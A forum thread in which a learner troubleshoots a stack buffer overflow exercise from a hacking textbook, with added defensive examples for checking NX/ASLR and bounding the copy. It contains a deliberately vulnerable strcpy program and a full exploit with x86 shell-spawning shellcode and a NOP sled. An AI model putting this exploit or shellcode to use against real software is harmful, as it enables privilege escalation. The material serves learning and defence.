I'm practicing coding an exploit from a book I'm currently working through (Hacking: The Art of Exploitation).
Now there's a program in the book that's vulnerable to a stack overflow. The other program is the exploit that takes advantage of the program by shuffling data into the buffer with the bytecode. Now the problem is I can understand some parts of the program. But when I compile both the vulnerable program and the exploit it doesn't seem to want to spit out a shell. Now I've written a vulnerable
program and tried to overwrite the EIP, and I've looked at GDB, and now I cannot seem to overwrite the register. Now I know there are programs that do additional checks on the EIP, and processors are now armed with DEP, even though I've disabled it in the BIOS and still I cannot overwrite the EIP. I've updated the BT3 kernel to 2.6.24 and I'm not too sure if the latest kernel does additional checks on the EIP.
All I want to know is: is there a way to know if anything like DEP has been enabled on my system?
Thanks, people.
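The question of how to tell whether DEP or ASLR is active on a Linux box can be answered from /proc. The following is an added example, not code from the thread or from the book: it reads the two standard Linux files (/proc/cpuinfo for the CPU's NX bit, which is the hardware half of DEP, and /proc/sys/kernel/randomize_va_space for the kernel's ASLR setting) and parses them with small helper functions that also work on constructed input. The function names are mine.

```c
/* Added example (not from the thread): report the exploit-mitigation state
 * of a Linux system by parsing /proc text. The parsers take strings so they
 * can be exercised on constructed input as well as on the live files. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Return 1 if a /proc/cpuinfo "flags" line lists the nx bit (Execute
 * Disable, the hardware side of DEP), 0 otherwise. Tokens are matched as
 * whole words, so a flag such as "nxfoo" is not mistaken for "nx". */
int cpuinfo_has_nx(const char *cpuinfo)
{
    const char *line = cpuinfo;
    while (line && *line) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);
        if (len > 5 && strncmp(line, "flags", 5) == 0) {
            const char *p = line;
            const char *stop = line + len;
            while (p < stop) {
                /* skip the "flags" label separator and spaces */
                while (p < stop && (isspace((unsigned char)*p) || *p == ':'))
                    p++;
                const char *tok = p;
                while (p < stop && !isspace((unsigned char)*p))
                    p++;
                if (p - tok == 2 && strncmp(tok, "nx", 2) == 0)
                    return 1;
            }
        }
        line = end ? end + 1 : NULL;
    }
    return 0;
}

/* Parse /proc/sys/kernel/randomize_va_space: 0 = ASLR off, 1 = stack and
 * mmap randomised, 2 = heap (brk) randomised too. Returns -1 on bad input. */
int aslr_level(const char *text)
{
    while (isspace((unsigned char)*text))
        text++;
    if (*text < '0' || *text > '2')
        return -1;
    return *text - '0';
}

/* Read a small /proc file into buf; returns 0 if it cannot be opened. */
static int slurp(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return 1;
}

int main(void)
{
    static char buf[65536];
    if (slurp("/proc/cpuinfo", buf, sizeof buf))
        printf("CPU NX bit (hardware DEP): %s\n",
               cpuinfo_has_nx(buf) ? "present" : "absent");
    if (slurp("/proc/sys/kernel/randomize_va_space", buf, sizeof buf))
        printf("ASLR level (randomize_va_space): %d\n", aslr_level(buf));
    return 0;
}
```

The NX bit only matters if the kernel actually marks the stack non-executable for the binary in question; `readelf -lW ./vuln` shows the GNU_STACK program header, whose flags tell you whether that executable's stack is mapped with execute permission. Both checks together explain most "the book's example no longer works" situations.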
Can you provide us with the source of your vulnerable program/exploit/shellcode so we may see if there's simply a coding/scripting error?
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
Yeah, sure.
The program:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[5];
    /* No bounds check: strcpy copies argv[1] up to its NUL byte, so an
       argument longer than 4 bytes overruns buffer. This is the bug the
       exercise is about, so it is left as is. */
    strcpy(buffer, argv[1]);
    return 0;
}
The exploit:
/* 32-bit x86 Linux only: the inline asm reads %esp and the shellcode is
   x86 machine code, so build with -m32 on a 64-bit toolchain. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)          // This is just a little function
{                               // used to return the stack pointer
    unsigned long esp;
    __asm__("movl %%esp, %0" : "=r"(esp));
    return esp;
}

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;                 // Use an offset of 0
    esp = sp();                 // Put the current stack pointer into esp
    ret = esp - offset;         // We want to overwrite the ret address

    printf("Stack pointer (ESP) : 0x%lx\n", esp);
    printf(" Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%lx\n", ret);

    // Allocate 600 bytes for buffer (on the heap)
    buffer = malloc(600);

    // Fill the entire buffer with the desired ret address
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for (i = 0; i < 600; i += 4)
    { *(addr_ptr++) = ret; }

    // Fill the first 200 bytes of the buffer with NOP instructions
    for (i = 0; i < 200; i++)
    { buffer[i] = '\x90'; }

    // Put the shellcode after the NOP sled
    ptr = buffer + 200;
    for (i = 0; i < (int) strlen(shellcode); i++)
    { *(ptr++) = shellcode[i]; }

    // End the string
    buffer[600-1] = 0;

    // Now call the program ./vuln with our crafted buffer as its argument
    // (the argument list must end with a NULL pointer, not a plain 0)
    execl("./vuln", "vuln", buffer, (char *) NULL);

    // Only reached if execl fails: free the buffer memory
    free(buffer);
    return 0;
}
I've compiled them both, and when I try to run the exploit all I get is a segmentation violation, which is understandable. When I put the program in gdb and send loads of 'A's this is what I get.
(gdb) info registers
eax 0x0 0
ecx 0x41414141 1094795585
edx 0xbfa2e532 -1079843534
ebx 0xb7f5fff4 -1208614924
esp 0x4141413d 0x4141413d
ebp 0x41414141 0x41414141
esi 0xb7f95ce0 -1208394528
edi 0x0 0
eip 0x8048389 0x8048389 <main+53> <not overwritten even after 100+ 'A's>
eflags 0x210286 [ PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
What I was talking about, DEP or summat else being enabled, is 'wrong' :-p. Because I managed to make a program that, instead of taking in an argument, copies a buffer into another buffer that's in a function; I can understand how I can overwrite the return address, and I'm copying a buffer into another buffer using a function in which the EIP is overwritten.
It's just that program above I got from that book that I cannot seem to get working.
Thanks for your help.
I hope I've provided enough information to solve the problem.
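For contrast with the five-byte strcpy program in the post above, here is the same copy done with a length check. This is an added example, not code from the thread or from the book; the function names (safe_copy, try_copy, copied_len) are mine, and BUF_SIZE mirrors the post's buffer[5].

```c
/* Added example (not from the thread or the book): a bounded replacement
 * for the unchecked strcpy in the posted program. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 5   /* same size as the posted program's buffer[5] */

/* Copy arg into buffer only if it fits, NUL terminator included.
 * Returns 0 on success; returns -1 and leaves buffer empty when the
 * argument is too long, so an oversize argv[1] can never overrun the
 * array the way the posted strcpy does. */
int safe_copy(char *buffer, size_t cap, const char *arg)
{
    size_t n = strlen(arg);
    if (cap == 0)
        return -1;
    if (n >= cap) {            /* need room for the terminating NUL */
        buffer[0] = '\0';
        return -1;
    }
    memcpy(buffer, arg, n + 1);
    return 0;
}

/* Helper: copy into a BUF_SIZE array and report the status. */
int try_copy(const char *arg)
{
    char buffer[BUF_SIZE];
    return safe_copy(buffer, sizeof buffer, arg);
}

/* Helper: length of the copied string after a successful copy, -1 if the
 * copy was refused. */
int copied_len(const char *arg)
{
    char buffer[BUF_SIZE];
    if (safe_copy(buffer, sizeof buffer, arg) != 0)
        return -1;
    return (int) strlen(buffer);
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (safe_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof buffer - 1);
        return 1;
    }
    printf("copied: %s\n", buffer);
    return 0;
}
```

Two compiler-side mitigations are worth knowing alongside the source fix: gcc's stack protector (`-fstack-protector`, switched on by default in many distributions' gcc builds) makes an overrun of a local array abort the program at function return instead of silently corrupting the saved registers, and `-D_FORTIFY_SOURCE=2` with optimisation turns strcpy into a checked variant when the destination size is known at compile time, as it is for a fixed-size array like buffer[5]. Either one would change what the poster sees in gdb, so they are the first things to rule out when a textbook overflow refuses to behave.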
Okay, I'll take a better look at this in a minute, but first, are you sure that your shellcode contains no 'null' characters (0)? Because if so, that will register as a stop and exit the program...
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
Nah, it doesn't contain NULL characters. I'm just wondering why it doesn't work, as NOP (x90) code is being fed into the buffer with the return address and the shellcode, but even still the shellcode doesn't want to execute, even though the exploit is using the NOP method to execute the shellcode. I'm going to have a look at it more. I shall get back to you if I find a way to get the shellcode to work. Thanks for your help though!!!!